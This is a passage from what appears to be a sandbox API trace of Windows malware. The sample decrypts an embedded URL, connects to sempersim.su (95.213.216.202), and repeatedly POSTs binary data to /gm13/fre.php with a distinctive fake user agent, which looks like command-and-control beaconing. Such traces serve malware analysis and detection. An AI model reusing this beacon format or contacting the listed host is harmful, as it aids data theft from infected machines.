dwFlags=0x0, lpMem=0x63a880 | out: hHeap=0x620000) returned 1 [0147.789] GetProcessHeap () returned 0x620000 [0147.789] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x643050 | out: hHeap=0x620000) returned 1 [0147.789] GetProcessHeap () returned 0x620000 [0147.789] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63d6b8 | out: hHeap=0x620000) returned 1 [0147.790] GetProcessHeap () returned 0x620000 [0147.790] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63bcb0 | out: hHeap=0x620000) returned 1 [0147.790] closesocket (s=0x2ec) returned 0 [0147.790] GetProcessHeap () returned 0x620000 [0147.790] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63b540 | out: hHeap=0x620000) returned 1 [0147.791] GetProcessHeap () returned 0x620000 [0147.791] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x635b58 | out: hHeap=0x620000) returned 1 [0147.791] GetProcessHeap () returned 0x620000 [0147.791] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x643488 | out: hHeap=0x620000) returned 1 [0147.792] GetProcessHeap () returned 0x620000 [0147.792] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x633228 | out: hHeap=0x620000) returned 1 [0147.792] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x644560, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x1308) returned 0x2ec [0147.794] Sleep (dwMilliseconds=0xea60) [0147.813] GetProcessHeap () returned 0x620000 [0147.813] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x642fc0 [0147.814] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0147.815] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0147.821] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0147.821] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x63bcb0) returned 1 [0147.832] GetProcessHeap () returned 0x620000 [0147.832] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x24) returned 0x638f78 [0147.832] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0147.833] CryptImportKey (in: hProv=0x63bcb0, pbData=0x638f78*, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x62d710) returned 1 [0147.833] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0147.834] CryptSetKeyParam (hKey=0x62d710, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0147.834] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0147.835] CryptSetKeyParam (hKey=0x62d710, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0147.835] GetProcessHeap () returned 0x620000 [0147.836] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x638f78 | out: hHeap=0x620000) returned 1 [0147.836] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0147.837] CryptDecrypt (in: hKey=0x62d710, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x642fc0, pdwDataLen=0x19fcfc | out: pbData=0x642fc0, pdwDataLen=0x19fcfc) returned 1 [0147.837] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0147.838] CryptDestroyKey (hKey=0x62d710) returned 1 [0147.838] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0147.839] CryptReleaseContext (hProv=0x63bcb0, dwFlags=0x0) returned 1 [0147.839] GetProcessHeap () returned 0x620000 [0147.839] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x212) returned 0x635b58 [0147.843] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0147.843] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x8c\x9a\x92\x8f\x9a\x8d\x8c\x96\x92Ñ\x8c\x8aÐ\x98\x92ÎÌÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0147.845] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0147.845] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x8c\x9a\x92\x8f\x9a\x8d\x8c\x96\x92Ñ\x8c\x8aÐ\x98\x92ÎÌÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0147.846] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0147.846] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x8c\x9a\x92\x8f\x9a\x8d\x8c\x96\x92Ñ\x8c\x8aÐ\x98\x92ÎÌÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0147.847] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0147.847] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x8c\x9a\x92\x8f\x9a\x8d\x8c\x96\x92Ñ\x8c\x8aÐ\x98\x92ÎÌÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0147.847] GetProcessHeap () returned 0x620000 [0147.847] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x633228 [0147.848] getaddrinfo (in: pNodeName="\x97\x8b\x8b\x8fÅÐÐ\x8c\x9a\x92\x8f\x9a\x8d\x8c\x96\x92Ñ\x8c\x8aÐ\x98\x92ÎÌÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0147.848] GetProcessHeap () returned 0x620000 [0147.848] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x633228 | out: hHeap=0x620000) returned 1 [0147.848] GetProcessHeap () returned 0x620000 [0147.849] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x635b58 | out: hHeap=0x620000) returned 1 [0147.849] GetProcessHeap () returned 0x620000 [0147.849] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x642fc0 | out: hHeap=0x620000) returned 1 [0147.849] GetProcessHeap () returned 0x620000 [0147.849] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x6430e0 [0147.850] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0147.850] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0147.858] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0147.859] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x63ba08) returned 1 [0147.866] GetProcessHeap () returned 0x620000 [0147.866] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x24) returned 0x638fd8 [0147.866] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0147.867] CryptImportKey (in: hProv=0x63ba08, pbData=0x638fd8*, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x62d710) returned 1 [0147.867] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0147.868] CryptSetKeyParam (hKey=0x62d710, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0147.869] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0147.871] CryptSetKeyParam (hKey=0x62d710, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0147.871] GetProcessHeap () returned 0x620000 [0147.872] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x638fd8 | out: hHeap=0x620000) returned 1 [0147.873] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0147.873] CryptDecrypt (in: hKey=0x62d710, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6430e0, pdwDataLen=0x19fcfc | out: pbData=0x6430e0, pdwDataLen=0x19fcfc) returned 1 [0147.874] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0147.874] CryptDestroyKey (hKey=0x62d710) returned 1 [0147.875] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0147.875] CryptReleaseContext (hProv=0x63ba08, dwFlags=0x0) returned 1 [0147.875] GetProcessHeap () returned 0x620000 [0147.875] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x212) returned 0x635b58 [0147.876] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0147.876] StrStrA (lpFirst="http://sempersim.su/gm13/fre.php", lpSrch="http://") returned="http://sempersim.su/gm13/fre.php" [0147.877] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0147.877] StrStrA (lpFirst="sempersim.su/gm13/fre.php", lpSrch="/") returned="/gm13/fre.php" [0147.878] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0147.878] StrStrA (lpFirst="sempersim.su/gm13/fre.php", lpSrch=":") returned 0x0 [0147.878] GetProcessHeap () returned 0x620000 [0147.879] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x633228 [0147.879] getaddrinfo (in: pNodeName="sempersim.su", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x644058*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x63eaf0*(sa_family=2, sin_port=0x50, sin_addr="95.213.216.202"), ai_next=0x0)) returned 0 [0147.884] GetProcessHeap () returned 0x620000 [0147.884] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x63b510 [0147.884] socket (af=2, type=1, protocol=6) returned 0x2f0 [0147.884] connect (s=0x2f0, name=0x63eaf0*(sa_family=2, sin_port=0x50, sin_addr="95.213.216.202"), namelen=16) returned 0 [0147.935] FreeAddrInfoW (pAddrInfo=0x644058*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x63eaf0*(sa_family=2, sin_port=0x50, sin_addr="95.213.216.202"), ai_next=0x0)) [0147.935] GetProcessHeap () returned 0x620000 [0147.935] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x7d) returned 0x63ba90 [0147.935] GetProcessHeap () returned 0x620000 [0147.935] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x201b) returned 0x644560 [0147.935] LoadLibraryW (lpLibFileName="user32") returned 0x74f40000 [0147.936] wvsprintfA (in: param_1=0x644560, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /gm13/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: sempersim.su\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 172 [0147.936] GetProcessHeap () returned 0x620000 [0147.936] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xae) returned 0x63d6b8 [0147.936] GetProcessHeap () returned 0x620000 [0147.937] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x644560 | out: hHeap=0x620000) returned 1 [0147.937] GetProcessHeap () returned 0x620000 [0147.937] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x3e) returned 0x642ea0 [0147.937] GetProcessHeap () returned 0x620000 [0147.937] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1fdc) returned 0x644560 [0147.937] LoadLibraryW (lpLibFileName="user32") returned 0x74f40000 [0147.938] wvsprintfA (in: param_1=0x644560, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /gm13/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: sempersim.su\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 6585B194\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 237 [0147.938] GetProcessHeap () returned 0x620000 [0147.938] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xef) returned 0x63a880 [0147.938] GetProcessHeap () returned 0x620000 [0147.939] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x644560 | out: hHeap=0x620000) returned 1 [0147.939] send (s=0x2f0, buf=0x63a880*, len=237, flags=0) returned 237 [0147.939] send (s=0x2f0, buf=0x6421e0*, len=159, flags=0) returned 159 [0147.939] GetProcessHeap () returned 0x620000 [0147.939] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xfd0) returned 0x644560 [0147.939] recv (in: s=0x2f0, buf=0x644560, len=4048, flags=0 | out: buf=0x644560*) returned 237 [0149.375] GetProcessHeap () returned 0x620000 [0149.376] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63a880 | out: hHeap=0x620000) returned 1 [0149.376] GetProcessHeap () returned 0x620000 [0149.376] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x642ea0 | out: hHeap=0x620000) returned 1 [0149.376] GetProcessHeap () returned 0x620000 [0149.376] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63d6b8 | out: hHeap=0x620000) returned 1 [0149.376] GetProcessHeap () returned 0x620000 [0149.376] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63ba90 | out: hHeap=0x620000) returned 1 [0149.376] closesocket (s=0x2f0) returned 0 [0149.377] GetProcessHeap () returned 0x620000 [0149.377] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63b510 | out: hHeap=0x620000) returned 1 [0149.377] GetProcessHeap () returned 0x620000 [0149.377] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x635b58 | out: hHeap=0x620000) returned 1 [0149.377] GetProcessHeap () returned 0x620000 [0149.378] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x6430e0 | out: hHeap=0x620000) returned 1 [0149.378] GetProcessHeap () returned 0x620000 [0149.378] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x633228 | out: hHeap=0x620000) returned 1 [0149.378] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x644560, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x12cc) returned 0x2f0 [0149.379] Sleep (dwMilliseconds=0xea60) [0149.386] GetProcessHeap () returned 0x620000 [0149.386] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x642ee8 [0149.386] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0149.387] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0149.393] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0149.394] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x63ba08) returned 1 [0149.404] GetProcessHeap () returned 0x620000 [0149.404] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x24) returned 0x639308 [0149.404] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0149.405] CryptImportKey (in: hProv=0x63ba08, pbData=0x639308*, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x62d710) returned 1 [0149.405] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0149.406] CryptSetKeyParam (hKey=0x62d710, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0149.406] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0149.407] CryptSetKeyParam (hKey=0x62d710, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0149.407] GetProcessHeap () returned 0x620000 [0149.407] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x639308 | out: hHeap=0x620000) returned 1 [0149.408] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0149.408] CryptDecrypt (in: hKey=0x62d710, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x642ee8, pdwDataLen=0x19fcfc | out: pbData=0x642ee8, pdwDataLen=0x19fcfc) returned 1 [0149.409] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0149.409] CryptDestroyKey (hKey=0x62d710) returned 1 [0149.410] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0149.410] CryptReleaseContext (hProv=0x63ba08, dwFlags=0x0) returned 1 [0149.410] GetProcessHeap () returned 0x620000 [0149.410] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x212) returned 0x635b58 [0149.411] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0149.411] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x8c\x9a\x92\x8f\x9a\x8d\x8c\x96\x92Ñ\x8c\x8aÐ\x98\x92ÎÌÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0149.411] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0149.412] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x8c\x9a\x92\x8f\x9a\x8d\x8c\x96\x92Ñ\x8c\x8aÐ\x98\x92ÎÌÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0149.412] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0149.412] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x8c\x9a\x92\x8f\x9a\x8d\x8c\x96\x92Ñ\x8c\x8aÐ\x98\x92ÎÌÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0149.413] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0149.413] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x8c\x9a\x92\x8f\x9a\x8d\x8c\x96\x92Ñ\x8c\x8aÐ\x98\x92ÎÌÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0149.413] GetProcessHeap () returned 0x620000 [0149.413] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x633228 [0149.413] getaddrinfo (in: pNodeName="\x97\x8b\x8b\x8fÅÐÐ\x8c\x9a\x92\x8f\x9a\x8d\x8c\x96\x92Ñ\x8c\x8aÐ\x98\x92ÎÌÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0149.413] GetProcessHeap () returned 0x620000 [0149.414] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x633228 | out: hHeap=0x620000) returned 1 [0149.414] GetProcessHeap () returned 0x620000 [0149.414] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x635b58 | out: hHeap=0x620000) returned 1 [0149.414] GetProcessHeap () returned 0x620000 [0149.415] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x642ee8 | out: hHeap=0x620000) returned 1 [0149.415] GetProcessHeap () returned 0x620000 [0149.415] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x6435a8 [0149.415] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0149.415] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0149.433] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0149.433] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x63ba08) returned 1 [0149.439] GetProcessHeap () returned 0x620000 [0149.439] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x24) returned 0x638f78 [0149.439] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0149.440] CryptImportKey (in: hProv=0x63ba08, pbData=0x638f78*, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x62d190) returned 1 [0149.440] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0149.440] CryptSetKeyParam (hKey=0x62d190, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0149.441] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0149.441] CryptSetKeyParam (hKey=0x62d190, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0149.441] GetProcessHeap () returned 0x620000 [0149.442] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x638f78 | out: hHeap=0x620000) returned 1 [0149.442] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0149.442] CryptDecrypt (in: hKey=0x62d190, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6435a8, pdwDataLen=0x19fcfc | out: pbData=0x6435a8, pdwDataLen=0x19fcfc) returned 1 [0149.443] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0149.443] CryptDestroyKey (hKey=0x62d190) returned 1 [0149.444] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0149.444] CryptReleaseContext (hProv=0x63ba08, dwFlags=0x0) returned 1 [0149.444] GetProcessHeap () returned 0x620000 [0149.444] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x212) returned 0x635b58 [0149.445] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0149.445] StrStrA (lpFirst="http://sempersim.su/gm13/fre.php", lpSrch="http://") returned="http://sempersim.su/gm13/fre.php" [0149.445] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0149.446] StrStrA (lpFirst="sempersim.su/gm13/fre.php", lpSrch="/") returned="/gm13/fre.php" [0149.446] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0149.446] StrStrA (lpFirst="sempersim.su/gm13/fre.php", lpSrch=":") returned 0x0 [0149.447] GetProcessHeap () returned 0x620000 [0149.447] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x633228 [0149.447] getaddrinfo (in: pNodeName="sempersim.su", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6443a0*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x63ec70*(sa_family=2, sin_port=0x50, sin_addr="95.213.216.202"), ai_next=0x0)) returned 0 [0149.451] GetProcessHeap () returned 0x620000 [0149.451] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x63b520 [0149.451] socket (af=2, type=1, protocol=6) returned 0x2f4 [0149.451] connect (s=0x2f4, name=0x63ec70*(sa_family=2, sin_port=0x50, sin_addr="95.213.216.202"), namelen=16) returned 0 [0149.533] FreeAddrInfoW (pAddrInfo=0x6443a0*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x63ec70*(sa_family=2, sin_port=0x50, sin_addr="95.213.216.202"), ai_next=0x0)) [0149.534] GetProcessHeap () returned 0x620000 [0149.534] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x7d) returned 0x63b7e8 [0149.534] GetProcessHeap () returned 0x620000 [0149.534] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x201b) returned 0x644560 [0149.534] LoadLibraryW (lpLibFileName="user32") returned 0x74f40000 [0149.535] wvsprintfA (in: param_1=0x644560, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /gm13/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: sempersim.su\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 172 [0149.535] GetProcessHeap () returned 0x620000 [0149.535] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xae) returned 0x63d6b8 [0149.535] GetProcessHeap () returned 0x620000 [0149.536] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x644560 | out: hHeap=0x620000) returned 1 [0149.536] GetProcessHeap () returned 0x620000 [0149.536] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x3e) returned 0x643368 [0149.536] GetProcessHeap () returned 0x620000 [0149.536] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1fdc) returned 0x644560 [0149.537] LoadLibraryW (lpLibFileName="user32") returned 0x74f40000 [0149.538] wvsprintfA (in: param_1=0x644560, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /gm13/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: sempersim.su\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 6585B194\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 237 [0149.538] GetProcessHeap () returned 0x620000 [0149.538] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xef) returned 0x63a880 [0149.538] GetProcessHeap () returned 0x620000 [0149.538] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x644560 | out: hHeap=0x620000) returned 1 [0149.538] send (s=0x2f4, buf=0x63a880*, len=237, flags=0) returned 237 [0149.539] send (s=0x2f4, buf=0x6421e0*, len=159, flags=0) returned 159 [0149.539] GetProcessHeap () returned 0x620000 [0149.539] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xfd0) returned 0x644560 [0149.539] recv (in: s=0x2f4, buf=0x644560, len=4048, flags=0 | out: buf=0x644560*) returned 237 [0151.210] GetProcessHeap () returned 0x620000 [0151.210] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63a880 | out: hHeap=0x620000) returned 1 [0151.210] GetProcessHeap () returned 0x620000 [0151.210] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x643368 | out: hHeap=0x620000) returned 1 [0151.210] GetProcessHeap () returned 0x620000 [0151.211] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63d6b8 | out: hHeap=0x620000) returned 1 [0151.211] GetProcessHeap () returned 0x620000 [0151.211] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63b7e8 | out: hHeap=0x620000) returned 1 [0151.211] closesocket (s=0x2f4) returned 0 [0151.212] GetProcessHeap () returned 0x620000 [0151.212] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63b520 | out: hHeap=0x620000) returned 1 [0151.212] GetProcessHeap () returned 0x620000 [0151.212] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x635b58 | out: hHeap=0x620000) returned 1 [0151.212] GetProcessHeap () returned 0x620000 [0151.212] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x6435a8 | out: hHeap=0x620000) returned 1 [0151.212] GetProcessHeap () returned 0x620000 [0151.213] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x633228 | out: hHeap=0x620000) returned 1 [0151.213] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x644560, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x1304) returned 0x2f4 [0151.215] Sleep (dwMilliseconds=0xea60) [0151.231] GetProcessHeap () returned 0x620000 [0151.231] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x643200 [0151.231] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 